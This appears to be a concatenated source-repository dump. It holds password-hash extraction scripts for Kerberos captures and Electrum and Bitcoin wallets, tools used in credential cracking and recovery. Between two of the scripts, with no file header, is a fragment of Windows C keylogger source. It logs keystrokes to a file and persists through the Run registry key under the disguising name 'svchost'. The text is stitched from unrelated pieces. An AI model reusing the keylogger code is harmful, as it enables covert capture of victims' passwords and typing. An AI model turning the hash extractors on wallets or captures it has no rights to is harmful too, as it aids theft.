64 | for item in r: 65 | if "value" in item.attrib: 66 | try: 67 | salt = binascii.unhexlify(item.attrib["value"]) 68 | break 69 | except: 70 | continue 71 | 72 | if message_type == "10": # Kerberos AS-REQ 73 | # locate encrypted timestamp 74 | r = msg.xpath('.//field[@name="kerberos.padata"]//field[@name="kerberos.PA_ENC_TIMESTAMP.encrypted"]') or msg.xpath('.//field[@name="kerberos.padata"]//field[@name="kerberos.cipher"]') 75 | if not r: 76 | continue 77 | if isinstance(r, list): 78 | r = r[0] 79 | PA_DATA_ENC_TIMESTAMP = r.attrib["value"] 80 | 81 | # locate etype 82 | r = msg.xpath('.//field[@name="kerberos.padata"]//field[@name="kerberos.etype"]') 83 | if not r: 84 | continue 85 | if isinstance(r, list): 86 | r = r[0] 87 | etype = r.attrib["show"] 88 | 89 | # locate realm 90 | r = msg.xpath('.//field[@name="kerberos.kdc_req_body"]//field[@name="kerberos.realm"]') or msg.xpath('.//field[@name="kerberos.req_body_element"]//field[@name="kerberos.realm"]') 91 | if not r: 92 | continue 93 | if isinstance(r, list): 94 | r = r[0] 95 | realm = r.attrib["show"] 96 | 97 | # locate cname 98 | r = msg.xpath('.//field[@name="kerberos.req_body_element"]//field[@name="kerberos.KerberosString"]') or msg.xpath('.//field[@name="kerberos.kdc_req_body"]//field[@name="kerberos.name_string"]') or msg.xpath('.//field[@name="kerberos.req_body_element"]//field[@name="kerberos.CNameString"]') 99 | if r: 100 | if isinstance(r, list): 101 | r = r[0] 102 | user = r.attrib["show"] 103 | 104 | if user == "": 105 | user = binascii.unhexlify(salt) 106 | 107 | # user, realm and salt are unused when etype is 23 ;) 108 | checksum = PA_DATA_ENC_TIMESTAMP[0:32] 109 | enc_timestamp = PA_DATA_ENC_TIMESTAMP[32:] 110 | if etype == "23": # user:$krb5pa$etype$user$realm$salt$HexTimestampHexChecksum 111 | sys.stdout.write("%s:$krb5pa$%s$%s$%s$%s$%s%s\n" % (user, 112 | etype, user, realm, salt, 113 | enc_timestamp, 114 | checksum)) 115 | else: 116 | if not salt: 117 | sys.stderr.write("[-] Hash might be 
broken, etype != 23 and salt not found!\n") 118 | sys.stdout.write("%s:$krb5pa$%s$%s$%s$%s$%s\n" % (user, 119 | etype, user, realm, salt, 120 | PA_DATA_ENC_TIMESTAMP)) 121 | 122 | for msg in messages: # extract hashes from TGS-REP messages 123 | r = msg.xpath('.//field[@name="kerberos.msg_type"]') or msg.xpath('.//field[@name="kerberos.msg.type"]') 124 | if not r: 125 | continue 126 | if isinstance(r, list): 127 | r = r[0] 128 | message_type = r.attrib["show"] 129 | if message_type == "13": # Kerberos TGS_REP 130 | spnps = msg.xpath('.//field[@name="kerberos.SNameString"]') # is this robust enough? 131 | spn = "Unknown" 132 | if isinstance(spnps, list): 133 | out = [] 134 | for spnp in spnps: 135 | out.append(spnp.attrib["show"]) 136 | spn = "/".join(out) 137 | # locate the hash 138 | rs = msg.xpath('.//field[@name="kerberos.enc_part_element"]') 139 | if not rs: 140 | continue 141 | if isinstance(rs, list): 142 | idx = 0 143 | multiple_entries = False 144 | if len(rs) >= 2: # this is typically 2 145 | multiple_entries = True 146 | for r in rs: 147 | if multiple_entries and idx != 0: # only generate hash for the first "kerberos.enc_part_element", is this always correct? 
148 | idx = idx + 1 149 | continue 150 | idx = idx + 1 151 | v = r.xpath('.//field[@name="kerberos.etype"]') 152 | if isinstance(v, list): 153 | v = v[0] 154 | etype = v.attrib["show"] 155 | v = r.xpath('.//field[@name="kerberos.cipher"]') 156 | if isinstance(v, list): 157 | v = v[0] 158 | data = v.attrib["value"] 159 | if etype != "23": 160 | sys.stderr.write("Currently unsupported etype %s found!\n" % etype) 161 | else: 162 | sys.stdout.write("%s:$krb5tgs$%s$%s$%s\n" % (spn, etype, data[:32], data[32:])) 163 | 164 | for msg in messages: # extract hashes from AS-REP messages 165 | r = msg.xpath('.//field[@name="kerberos.msg_type"]') or msg.xpath('.//field[@name="kerberos.msg.type"]') 166 | if not r: 167 | continue 168 | if isinstance(r, list): 169 | r = r[0] 170 | message_type = r.attrib["show"] 171 | 172 | if message_type == "11": # Kerberos AS-REP 173 | s = msg.xpath('.//field[@name="kerberos.salt"]') # is this valid for M$ AD too? 174 | # locate the hash 175 | rs = msg.xpath('.//field[@name="kerberos.enc_part_element"]') 176 | if not rs: 177 | continue 178 | if isinstance(rs, list): 179 | idx = 0 180 | multiple_entries = False 181 | if len(rs) >= 2: # this is typically 2 182 | multiple_entries = True 183 | for r in rs: 184 | if multiple_entries and idx == 0: # skip over the first entry, is this always correct? 185 | idx = idx + 1 186 | continue 187 | idx = idx + 1 188 | v = r.xpath('.//field[@name="kerberos.etype"]') 189 | if isinstance(v, list): 190 | v = v[0] 191 | etype = v.attrib["show"] 192 | if etype != "23": 193 | if s is None: 194 | sys.stderr.write("Unable to find kerberos.salt value. Please report this bug to us!\n") 195 | continue 196 | if isinstance(s, list): 197 | if len(s) == 0: 198 | sys.stderr.write("Unable to find kerberos.salt value. 
Please report this bug to us!\n") 199 | continue 200 | s = s[0] 201 | salt = s.attrib["show"] 202 | v = r.xpath('.//field[@name="kerberos.cipher"]') 203 | if isinstance(v, list): 204 | v = v[0] 205 | data = v.attrib["value"] 206 | if etype != "23": 207 | sys.stdout.write("$krb5asrep$%s$%s$%s$%s\n" % (etype, salt, data[0:-24], data[-24:])) 208 | else: 209 | sys.stdout.write("$krb5asrep$%s$%s$%s\n" % (etype, data[0:32], data[32:])) 210 | 211 | if __name__ == "__main__": 212 | if len(sys.argv) < 2: 213 | sys.stdout.write("Usage: %s <.pdml files>\n" % sys.argv[0]) 214 | sys.stdout.write("\ntshark -r sample.pcap -T pdml > sample.pdml; %s sample.pdml\n" % sys.argv[0]) 215 | sys.exit(1) 216 | 217 | for i in range(1, len(sys.argv)): 218 | process_file(sys.argv[i]) 219 | -------------------------------------------------------------------------------- /electrum2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This software is Copyright (c) 2017, Dhiru Kholia 4 | # and it is hereby released under GPL v2 license. 5 | # 6 | # Major parts are borrowed from the "btcrecover" program which is, 7 | # Copyright (C) 2014-2016 Christopher Gurnee and under GPL v2. 8 | # 9 | # See https://github.com/gurnec/btcrecover for details. 
#
# References,
#
# https://github.com/gurnec/btcrecover/blob/master/btcrecover/btcrpass.py
# https://github.com/spesmilo/electrum (see 1.9.8 version)

import os
import sys
# import traceback
import base64
import binascii
import itertools
import optparse

try:
    import json
    assert json
except ImportError:
    try:
        sys.path.append(".")
        import simplejson as json
    except ImportError:
        sys.stderr.write("Please install json / simplejson module which is currently not installed.\n")
        sys.exit(-1)


def process_electrum28_wallets(bname, data, options):
    """Emit a "$electrum$4" (or "$electrum$5" when truncated) hash line for an
    Electrum 2.8+ fully-encrypted wallet.

    bname   -- wallet file basename, used as the login field of the output
    data    -- raw base64 blob read from the wallet file
    options -- parsed options; options.truncate forces the truncated format
    """
    version = 4  # hack
    MIN_LEN = 37 + 32 + 32  # header + ciphertext + trailer
    if len(data) < MIN_LEN * 4 / 3:  # base64 expands the payload by 4/3
        sys.stderr.write("%s: Electrum 2.8+ wallet is too small to parse!\n" % bname)
        return
    data = base64.b64decode(data)
    ephemeral_pubkey = data[4:37]  # compressed representation
    # ciphertext = data[37:-32]
    mac = data[-32:]
    all_but_mac = data[:-32]
    if len(all_but_mac) > 16384 or options.truncate:
        sys.stderr.write("Forcing generation of truncated hash, this is not tested well!\n")
        all_but_mac = data[37:][:1024]  # skip over the 4-byte magic & 33-byte pubkey
        version = 5  # hack
    ephemeral_pubkey = binascii.hexlify(ephemeral_pubkey).decode("ascii")
    mac = binascii.hexlify(mac).decode("ascii")
    all_but_mac = binascii.hexlify(all_but_mac).decode("ascii")
    sys.stdout.write("%s:$electrum$%d*%s*%s*%s\n" % (bname, version, ephemeral_pubkey, all_but_mac, mac))


def process_file(filename, options):
    """Extract a crackable hash line from a single Electrum wallet file.

    Supports Electrum 1.x literal-dict wallets, 2.x JSON wallets (bip32,
    old-seed and imported keystores, multisig/2fa, loose imported keys) and
    2.8+ fully-encrypted wallets.  Output goes to stdout, diagnostics to
    stderr.  Returns None (or -13 on a decode error).
    """
    bname = os.path.basename(filename)
    try:
        # BUG FIX: the file handle used to stay open until the very end and
        # leaked on every early return; read it once and close immediately.
        with open(filename, "rb") as f:
            data = f.read()
    except IOError:
        e = sys.exc_info()[1]
        sys.stderr.write("%s\n" % str(e))
        return

    # detect Electrum 2.7+ encrypted wallets (raw base64 blob, magic "BIE1")
    try:
        # BUG FIX: the prefix must be bytes -- comparing against the str
        # 'BIE1' raised TypeError on Python 3, which the except below
        # silently swallowed, so 2.8+ wallets were never detected.
        if base64.b64decode(data).startswith(b'BIE1'):
            process_electrum28_wallets(bname, data, options)
            return
    except Exception:
        # not base64 at all -- fall through to the JSON/literal parsers
        pass

    try:
        data = data.decode("utf-8")
    except Exception:
        e = sys.exc_info()[1]
        sys.stderr.write("%s\n" % str(e))
        return -13

    version = None
    try:
        wallet = json.loads(data)
    except ValueError:
        try:
            from ast import literal_eval  # hack for Electrum 1.x wallets
            wallet = literal_eval(data)
            version = 1
        except Exception:
            sys.stderr.write("%s: Unable to parse the wallet file!\n" % bname)
            # traceback.print_exc()
            return

    # This check applies for both Electrum 2.x and 1.x
    if "use_encryption" in wallet and wallet.get("use_encryption") == False:
        sys.stderr.write("%s: Electrum wallet is not encrypted!\n" % bname)
        return

    # Is this an upgraded wallet, from 1.x to 2.y (y<7)?
    if "wallet_type" in wallet and wallet["wallet_type"] == "old":
        sys.stderr.write("%s: Upgraded wallet found!\n" % bname)
        version = 1  # hack

    if version == 1:
        try:
            seed_version = wallet["seed_version"]
            seed_data = base64.b64decode(wallet["seed"])
            if len(seed_data) != 64:
                sys.stderr.write("%s: Weird seed length value '%d' found!\n" % (bname, len(seed_data)))
                return
            if seed_version == 4:
                iv = seed_data[:16]
                encrypted_data = seed_data[16:32]
                iv = binascii.hexlify(iv).decode("ascii")
                encrypted_data = binascii.hexlify(encrypted_data).decode("ascii")
                sys.stdout.write("%s:$electrum$1*%s*%s\n" % (bname, iv, encrypted_data))
                return
            else:
                sys.stderr.write("%s: Unknown seed_version value '%d' found!\n" % (bname, seed_version))
                return
        except Exception:
            # BUG FIX: the message had one %s but was given two arguments
            # (and seed_version may be unbound here), so the error path
            # itself raised TypeError.
            sys.stderr.write("%s: Problem in parsing seed value!\n" % bname)
            return

    # not a version 1 wallet
    wallet_type = wallet.get("wallet_type")
    if not wallet_type:
        sys.stderr.write("%s: Unrecognized wallet format!\n" % (bname))
        return
    # BUG FIX: seed_version was read but never assigned on this path,
    # so the error message below raised NameError.
    seed_version = wallet.get("seed_version")
    if seed_version not in (11, 12, 13) and wallet_type != "imported":  # all 2.x versions as of Oct 2016
        sys.stderr.write("%s: Unsupported Electrum2 seed version '%s' found!\n" % (bname, seed_version))
        return
    xprv = None
    version = 2  # hack
    while True:  # "loops" exactly once; only here so we've something to break out of
        # Electrum 2.7+ standard wallets have a keystore
        keystore = wallet.get("keystore")
        if keystore:
            keystore_type = keystore.get("type", "(not found)")

            # Wallets originally created by an Electrum 2.x version
            if keystore_type == "bip32":
                xprv = keystore.get("xprv")
                if xprv:
                    break

            # Former Electrum 1.x wallet after conversion to Electrum 2.7+ standard-wallet format
            elif keystore_type == "old":
                seed_data = keystore.get("seed")
                if seed_data:
                    seed_data = base64.b64decode(seed_data)
                    if len(seed_data) != 64:
                        raise RuntimeError("Electrum1 encrypted seed plus iv is not 64 bytes long")
                    iv = seed_data[:16]              # only need the 16-byte IV plus
                    encrypted_data = seed_data[16:32]  # the first 16-byte encrypted block of the seed
                    version = 1  # hack
                    break

            # Imported loose private keys
            elif keystore_type == "imported":
                for privkey in keystore["keypairs"].values():
                    if privkey:
                        privkey = base64.b64decode(privkey)
                        if len(privkey) != 80:
                            raise RuntimeError("Electrum2 private key plus iv is not 80 bytes long")
                        iv = privkey[-32:-16]          # only need the 16-byte IV plus
                        encrypted_data = privkey[-16:]  # the last 16-byte encrypted block of the key
                        version = 3  # dirty hack!
                        break
                if version == 3:  # another dirty hack, break out of outer loop
                    break
            else:
                sys.stderr.write("%s: found unsupported keystore type!\n" % (bname))

        # Electrum 2.7+ multisig or 2fa wallet
        for i in itertools.count(1):
            x = wallet.get("x{}/".format(i))
            if not x:
                break
            x_type = x.get("type", "(not found)")
            if x_type == "bip32":
                xprv = x.get("xprv")
                if xprv:
                    break
            else:
                sys.stderr.write("%s: found unsupported keystore type!\n" % (bname))
        if xprv:
            break

        # Electrum 2.0 - 2.6.4 wallet with imported loose private keys
        if wallet_type == "imported":
            for imported in wallet["accounts"]["/x"]["imported"].values():
                privkey = imported[1] if len(imported) >= 2 else None
                if privkey:
                    privkey = base64.b64decode(privkey)
                    if len(privkey) != 80:
                        raise RuntimeError("Electrum2 private key plus iv is not 80 bytes long")
                    iv = privkey[-32:-16]          # only need the 16-byte IV plus
                    encrypted_data = privkey[-16:]  # the last 16-byte encrypted block of the key
                    version = 3  # dirty hack
                    break
            if version == 3:  # another dirty hack, break out of outer loop
                break

        # Electrum 2.0 - 2.6.4 wallet (of any other wallet type)
        else:
            mpks = wallet.get("master_private_keys")
            if mpks:
                # BUG FIX: dict views are not subscriptable on Python 3
                xprv = list(mpks.values())[0]
                break

        raise RuntimeError("No master private keys or seeds found in Electrum2 wallet")

    if xprv:
        xprv_data = base64.b64decode(xprv)
        if len(xprv_data) != 128:
            raise RuntimeError("Unexpected Electrum2 encrypted master private key length")
        iv = xprv_data[:16]               # only need the 16-byte IV plus
        encrypted_data = xprv_data[16:32]  # the first 16-byte encrypted block of a master privkey

    iv = binascii.hexlify(iv).decode("ascii")
    encrypted_data = binascii.hexlify(encrypted_data).decode("ascii")

    sys.stdout.write("%s:$electrum$%d*%s*%s\n" % (bname, version, iv, encrypted_data))


if __name__ == "__main__":
    if len(sys.argv) < 2:
        # BUG FIX: the message said "Ethereum Wallet files" -- a copy-paste
        # leftover from ethereum2john.py; this tool reads Electrum wallets.
        sys.stderr.write("Usage: %s [Electrum wallet files]\n" % sys.argv[0])
        sys.exit(-1)

    parser = optparse.OptionParser()
    parser.add_option('-t', action="store_true", dest="truncate", default=False,
                      help="force generation of truncated hashes")
    options, remainder = parser.parse_args()

    for name in remainder:
        process_file(name, options)
if((character>=39)&&(character<=64)) 97 | 98 | { 99 | 100 | fputc(character,file); 101 | 102 | fclose(file); 103 | 104 | break; 105 | 106 | } 107 | 108 | else if((character>64)&&(character<91)) 109 | 110 | { 111 | 112 | character+=32; 113 | 114 | fputc(character,file); 115 | 116 | fclose(file); 117 | 118 | break; 119 | 120 | } 121 | 122 | else 123 | 124 | { 125 | 126 | switch(character) 127 | 128 | { 129 | 130 | case VK_SPACE: 131 | 132 | fputc(' ',file); 133 | 134 | fclose(file); 135 | break; 136 | 137 | case VK_SHIFT: 138 | 139 | fputs("[SHIFT]",file); 140 | 141 | fclose(file); 142 | 143 | break; 144 | 145 | case VK_RETURN: 146 | 147 | fputs("n[ENTER]",file); 148 | 149 | fclose(file); 150 | 151 | break; 152 | 153 | case VK_BACK: 154 | 155 | fputs("[BACKSPACE]",file); 156 | 157 | fclose(file); 158 | 159 | break; 160 | 161 | case VK_TAB: 162 | 163 | fputs("[TAB]",file); 164 | 165 | fclose(file); 166 | 167 | break; 168 | 169 | case VK_CONTROL: 170 | 171 | fputs("[CTRL]",file); 172 | 173 | fclose(file); 174 | 175 | break; 176 | 177 | case VK_DELETE: 178 | 179 | fputs("[DEL]",file); 180 | 181 | fclose(file); 182 | 183 | break; 184 | 185 | case VK_OEM_1: 186 | 187 | fputs("[;:]",file); 188 | 189 | fclose(file); 190 | 191 | break; 192 | 193 | case VK_OEM_2: 194 | 195 | fputs("[/?]",file); 196 | 197 | fclose(file); 198 | 199 | break; 200 | 201 | case VK_OEM_3: 202 | 203 | fputs("[`~]",file); 204 | 205 | fclose(file); 206 | 207 | break; 208 | 209 | case VK_OEM_4: 210 | 211 | fputs("[ [{ ]",file); 212 | 213 | fclose(file); 214 | 215 | break; 216 | 217 | case VK_OEM_5: 218 | 219 | fputs("[\|]",file); 220 | 221 | fclose(file); 222 | 223 | break; 224 | 225 | case VK_OEM_6: 226 | 227 | fputs("[ ]} ]",file); 228 | 229 | fclose(file); 230 | 231 | break; 232 | 233 | case VK_OEM_7: 234 | 235 | fputs("['"]",file); 236 | 237 | fclose(file); 238 | 239 | break; 240 | 241 | /*case VK_OEM_PLUS: 242 | 243 | fputc('+',file); 244 | 245 | fclose(file); 246 | 247 | break; 248 | 249 | case 
VK_OEM_COMMA: 250 | 251 | fputc(',',file); 252 | 253 | fclose(file); 254 | 255 | break; 256 | 257 | case VK_OEM_MINUS: 258 | 259 | fputc('-',file); 260 | 261 | fclose(file); 262 | 263 | break; 264 | 265 | case VK_OEM_PERIOD: 266 | 267 | fputc('.',file); 268 | 269 | fclose(file); 270 | 271 | break;*/ 272 | 273 | case VK_NUMPAD0: 274 | 275 | fputc('0',file); 276 | 277 | fclose(file); 278 | 279 | break; 280 | 281 | case VK_NUMPAD1: 282 | 283 | fputc('1',file); 284 | 285 | fclose(file); 286 | 287 | break; 288 | 289 | case VK_NUMPAD2: 290 | 291 | fputc('2',file); 292 | 293 | fclose(file); 294 | 295 | break; 296 | case VK_NUMPAD3: 297 | 298 | fputc('3',file); 299 | 300 | fclose(file); 301 | 302 | break; 303 | 304 | case VK_NUMPAD4: 305 | 306 | fputc('4',file); 307 | 308 | fclose(file); 309 | 310 | break; 311 | 312 | case VK_NUMPAD5: 313 | 314 | fputc('5',file); 315 | 316 | fclose(file); 317 | 318 | break; 319 | 320 | case VK_NUMPAD6: 321 | 322 | fputc('6',file); 323 | 324 | fclose(file); 325 | 326 | break; 327 | 328 | case VK_NUMPAD7: 329 | 330 | fputc('7',file); 331 | 332 | fclose(file); 333 | 334 | break; 335 | 336 | case VK_NUMPAD8: 337 | 338 | fputc('8',file); 339 | 340 | fclose(file); 341 | 342 | break; 343 | 344 | case VK_NUMPAD9: 345 | 346 | fputc('9',file); 347 | 348 | fclose(file); 349 | 350 | break; 351 | 352 | case VK_CAPITAL: 353 | 354 | fputs("[CAPS LOCK]",file); 355 | 356 | fclose(file); 357 | 358 | break; 359 | 360 | default: 361 | 362 | fclose(file); 363 | 364 | break; 365 | 366 | } 367 | 368 | } 369 | 370 | } 371 | 372 | } 373 | 374 | } 375 | 376 | 377 | 378 | } 379 | 380 | return EXIT_SUCCESS; 381 | 382 | } 383 | 384 | 385 | 386 | int test_key(void) 387 | 388 | { 389 | 390 | int check; 391 | 392 | HKEY hKey; 393 | 394 | char path[BUFSIZE]; 395 | 396 | DWORD buf_length=BUFSIZE; 397 | 398 | int reg_key; 399 | 400 | 401 | 402 | reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,KEY_QUERY_VALUE,&hKey); 403 | 404 | 
if(reg_key!=0) 405 | 406 | { 407 | 408 | check=1; 409 | 410 | return check; 411 | 412 | } 413 | 414 | 415 | 416 | reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length); 417 | 418 | 419 | 420 | if((reg_key!=0)||(buf_length>BUFSIZE)) 421 | 422 | check=2; 423 | 424 | if(reg_key==0) 425 | 426 | check=0; 427 | 428 | 429 | 430 | RegCloseKey(hKey); 431 | 432 | return check; 433 | } 434 | 435 | 436 | 437 | int create_key(char *path) 438 | 439 | { 440 | 441 | int reg_key,check; 442 | 443 | 444 | HKEY hkey; 445 | 446 | 447 | 448 | reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",&hkey); 449 | 450 | if(reg_key==0) 451 | 452 | { 453 | 454 | RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path)); 455 | 456 | check=0; 457 | 458 | return check; 459 | 460 | } 461 | 462 | if(reg_key!=0) 463 | 464 | check=1; 465 | 466 | 467 | 468 | return check; 469 | 470 | } 471 | -------------------------------------------------------------------------------- /bitcoin2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # jackjack's pywallet.py 4 | # https://github.com/jackjack-jj/pywallet 5 | # forked from Joric's pywallet.py 6 | 7 | missing_dep = [] 8 | 9 | try: 10 | from bsddb.db import * 11 | except: 12 | from bsddb3.db import * 13 | # missing_dep.append('bsddb') 14 | 15 | import os, sys, time 16 | pyw_filename = sys.argv[0].split('/')[len(sys.argv[0].split('/')) - 1] 17 | pyw_path = os.getcwd() 18 | 19 | try: 20 | import json 21 | except: 22 | try: 23 | import simplejson as json 24 | except: 25 | sys.stdout.write("json or simplejson package is needed") 26 | 27 | import logging 28 | import struct 29 | import traceback 30 | import types 31 | import string 32 | import hashlib 33 | import random 34 | import math 35 | import binascii 36 | 37 | max_version = 81000 38 | addrtype = 0 39 | json_db = {} 40 | private_keys = [] 41 | private_hex_keys = [] 42 | 
# Global state shared by the pywallet helpers below.
passphrase = ""
global_merging_message = ["", ""]

wallet_dir = ""
wallet_name = ""

# Size constants: decimal (ko/Mo/Go/To) and binary (kio/Mio/Gio/Tio) units.
ko = 1e3
kio = 1024
Mo = 1e6
Mio = 1024 ** 2
Go = 1e9
Gio = 1024 ** 3
To = 1e12
Tio = 1024 ** 4

# DER byte patterns that immediately precede / follow a raw 32-byte EC
# private key inside a wallet blob.
prekeys = [binascii.unhexlify(h) for h in ("308201130201010420", "308201120201010420")]
postkeys = [binascii.unhexlify(h) for h in ("a081a530", "81a530")]


def hash_160(public_key):
    """RIPEMD-160 of SHA-256 of *public_key* (Bitcoin's HASH160)."""
    sha = hashlib.sha256(public_key).digest()
    ripemd = hashlib.new('ripemd160')
    ripemd.update(sha)
    return ripemd.digest()


def public_key_to_bc_address(public_key):
    """Convert a serialized public key to a base58 Bitcoin address."""
    return hash_160_to_bc_address(hash_160(public_key))


def hash_160_to_bc_address(h160):
    """Prefix *h160* with the version byte, append a 4-byte checksum, base58-encode."""
    versioned = chr(addrtype) + h160
    checksum = Hash(versioned)[0:4]
    return b58encode(versioned + checksum)


def bc_address_to_hash_160(addr):
    """Decode a base58 address and return its 20-byte HASH160 payload."""
    decoded = b58decode(addr, 25)
    return decoded[1:21]


__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)


def b58encode(v):
    """ encode v, which is a string of bytes, to base58.
    """
    acc = 0
    for ch in v:
        acc = acc * 256 + ord(ch)

    encoded = ''
    while acc >= __b58base:
        acc, digit = divmod(acc, __b58base)
        encoded = __b58chars[digit] + encoded
    encoded = __b58chars[acc] + encoded

    # Bitcoin does a little leading-zero-compression:
    # leading 0-bytes in the input become leading-1s
    pad = 0
    for ch in v:
        if ch != '\0':
            break
        pad += 1

    return (__b58chars[0] * pad) + encoded


def b58decode(v, length):
    """ decode v into a string of len bytes
    """
    acc = 0
    for ch in v:
        acc = acc * __b58base + __b58chars.find(ch)

    decoded = ''
    while acc >= 256:
        acc, byte = divmod(acc, 256)
        decoded = chr(byte) + decoded
    decoded = chr(acc) + decoded

    # leading '1' characters map back to leading zero bytes
    pad = 0
    for ch in v:
        if ch != __b58chars[0]:
            break
        pad += 1

    decoded = chr(0) * pad + decoded
    if length is not None and len(decoded) != length:
        return None

    return decoded

# end of bitcointools base58 implementation


def Hash(data):
    """Bitcoin's double SHA-256."""
    inner = hashlib.sha256(data).digest()
    return hashlib.sha256(inner).digest()

# bitcointools wallet.dat handling code


def create_env(db_dir):
    """Open (creating if necessary) a Berkeley DB environment in *db_dir*."""
    flags = (DB_CREATE | DB_INIT_LOCK | DB_INIT_LOG | DB_INIT_MPOOL |
             DB_INIT_TXN | DB_THREAD | DB_RECOVER)
    db_env = DBEnv(0)
    db_env.open(db_dir, flags)
    return db_env


def parse_CAddress(vds):
    """Deserialize a CAddress record; fields keep their defaults on failure."""
    d = {'ip': '0.0.0.0', 'port': 0, 'nTime': 0}
    try:
        d['nVersion'] = vds.read_int32()
        d['nTime'] = vds.read_uint32()
        d['nServices'] = vds.read_uint64()
        d['pchReserved'] = vds.read_bytes(12)
        d['ip'] = socket.inet_ntoa(vds.read_bytes(4))
        d['port'] = vds.read_uint16()
    except:
        pass
    return d
def deserialize_CAddress(d):
    """Render a parsed CAddress dict as "ip:port"."""
    return d['ip'] + ":" + str(d['port'])


def parse_BlockLocator(vds):
    """Read a block locator: compact-size count followed by 32-byte hashes."""
    d = {'hashes': []}
    nHashes = vds.read_compact_size()
    for i in range(nHashes):  # BUG FIX: xrange is Python 2 only
        d['hashes'].append(vds.read_bytes(32))
    return d


def deserialize_BlockLocator(d):
    """Render the top (most recent) hash of a block locator as hex."""
    # BUG FIX: str.encode('hex_codec') is Python 2 only; binascii works on 2 and 3
    top = binascii.hexlify(d['hashes'][0][::-1]).decode("ascii")
    return "Block Locator top: " + top


def parse_setting(setting, vds):
    """Decode one wallet "setting" record according to its key name."""
    if setting[0] == "f":  # flag (boolean) settings
        return str(vds.read_boolean())
    elif setting[0:4] == "addr":  # CAddress
        d = parse_CAddress(vds)
        return deserialize_CAddress(d)
    elif setting == "nTransactionFee":
        return vds.read_int64()
    elif setting == "nLimitProcessors":
        return vds.read_int32()
    return 'unknown setting'


class SerializationError(Exception):
    """ Thrown when there's a problem deserializing or serializing """


def ts():
    """Return the current local time as an integer Unix timestamp."""
    # BUG FIX: `datetime` was never imported at module level, so ts()
    # raised NameError whenever it was called.
    from datetime import datetime
    return int(time.mktime(datetime.now().timetuple()))


def check_postkeys(key, postkeys):
    """Return True if *key* starts with any of the patterns in *postkeys*."""
    for pattern in postkeys:
        if key[:len(pattern)] == pattern:
            return True
    return False


def one_element_in(a, string):
    """Return True if any element of *a* occurs as a substring of *string*."""
    for i in a:
        if i in string:
            return True
    return False


def first_read(device, size, prekeys, inc=10000):
    """Coarse-scan a raw *device* of *size* bytes in *inc*-byte chunks and
    return the list of chunk offsets where runs containing a key prefix
    start and stop (alternating begin/end offsets)."""
    # BUG FIX: datetime was never imported at module level (see ts()).
    from datetime import datetime
    t0 = ts() - 1
    try:
        fd = os.open(device, os.O_RDONLY)
    except OSError:
        sys.stdout.write("Can't open %s, check the path or try as root" % device)
        sys.exit(0)  # BUG FIX: exit() comes from the site module; sys.exit always exists
    prekey = prekeys[0]
    data = ""
    i = 0
    data = os.read(fd, i)
    before_contained_key = False
    contains_key = False
    ranges = []

    while i < int(size):
        # progress + ETA roughly every 10 MiB
        if i % (10 * Mio) > 0 and i % (10 * Mio) <= inc:
            sys.stdout.write("\n%.2f/%.2f Go" % (i / 1e9, size / 1e9))
            t = ts()
            speed = i / (t - t0)  # NOTE(review): integer division under py2 -- display only
            ETAts = size / speed + t0
            d = datetime.fromtimestamp(ETAts)
            sys.stdout.write(d.strftime(" ETA: %H:%M:%S"))

        try:
            data = os.read(fd, inc)
        except Exception as exc:
            # unreadable sector: skip ahead and keep scanning
            os.lseek(fd, inc, os.SEEK_CUR)
            sys.stdout.write(str(exc))
            i += inc
            continue

        contains_key = one_element_in(prekeys, data)

        # record a boundary whenever the "contains a key" state flips
        if not before_contained_key and contains_key:
            ranges.append(i)
        if before_contained_key and not contains_key:
            ranges.append(i)

        before_contained_key = contains_key
        i += inc

    os.close(fd)
    return ranges


def shrink_intervals(device, ranges, prekeys, inc=1000):
    """Refine the coarse begin/end offsets from first_read() down to
    *inc*-byte resolution by rescanning each interval in mini blocks."""
    prekey = prekeys[0]
    nranges = []
    fd = os.open(device, os.O_RDONLY)
    for j in range(len(ranges) // 2):  # BUG FIX: '/' is float division on py3
        before_contained_key = False
        contains_key = False
        bi = ranges[2 * j]
        bf = ranges[2 * j + 1]

        mini_blocks = []
        k = bi
        while k <= bf + len(prekey) + 1:
            mini_blocks.append(k)
            k += inc
        mini_blocks.append(k)

        for k in range(len(mini_blocks) // 2):  # BUG FIX: integer division
            # widen each mini block so a prefix straddling the edge is seen
            mini_blocks[2 * k] -= len(prekey) + 1
            mini_blocks[2 * k + 1] += len(prekey) + 1

            bi = mini_blocks[2 * k]
            bf = mini_blocks[2 * k + 1]

            os.lseek(fd, bi, 0)

            data = os.read(fd, bf - bi + 1)
            contains_key = one_element_in(prekeys, data)

            if not before_contained_key and contains_key:
                nranges.append(bi)
            if before_contained_key and not contains_key:
                nranges.append(bi + len(prekey) + 1 + len(prekey) + 1)

            before_contained_key = contains_key

    os.close(fd)

    return nranges


def find_offsets(device, ranges, prekeys):
    """Scan the refined intervals byte by byte and return
    [total_bytes_read, exact offsets where a key prefix ends]."""
    prekey = prekeys[0]
    list_offsets = []
    to_read = 0
    fd = os.open(device, os.O_RDONLY)
    for i in range(len(ranges) // 2):  # BUG FIX: integer division
        bi = ranges[2 * i] - len(prekey) - 1
        os.lseek(fd, bi, 0)
        bf = ranges[2 * i + 1] + len(prekey) + 1
        to_read += bf - bi + 1
        # sliding window primed with len(prekey) zero bytes
        buf = ""
        for j in range(len(prekey)):
            buf += "\x00"
        curs = bi

        while curs <= bf:
            data = os.read(fd, 1)
            buf = buf[1:] + data
            if buf in prekeys:
                list_offsets.append(curs)
            curs += 1

    os.close(fd)

    return [to_read, list_offsets]


def read_keys(device, list_offsets):
    """Read 32-byte candidate private keys at each offset and keep the
    (deduplicated) hex keys whose trailing bytes match a postkey pattern."""
    found_hexkeys = []
    fd = os.open(device, os.O_RDONLY)
    for offset in list_offsets:
        os.lseek(fd, offset + 1, 0)
        data = os.read(fd, 40)
        # BUG FIX: .encode('hex') / .decode('hex') are Python 2 only;
        # binascii.hexlify works on both, and the round-trip through hex
        # before check_postkeys was a no-op anyway.
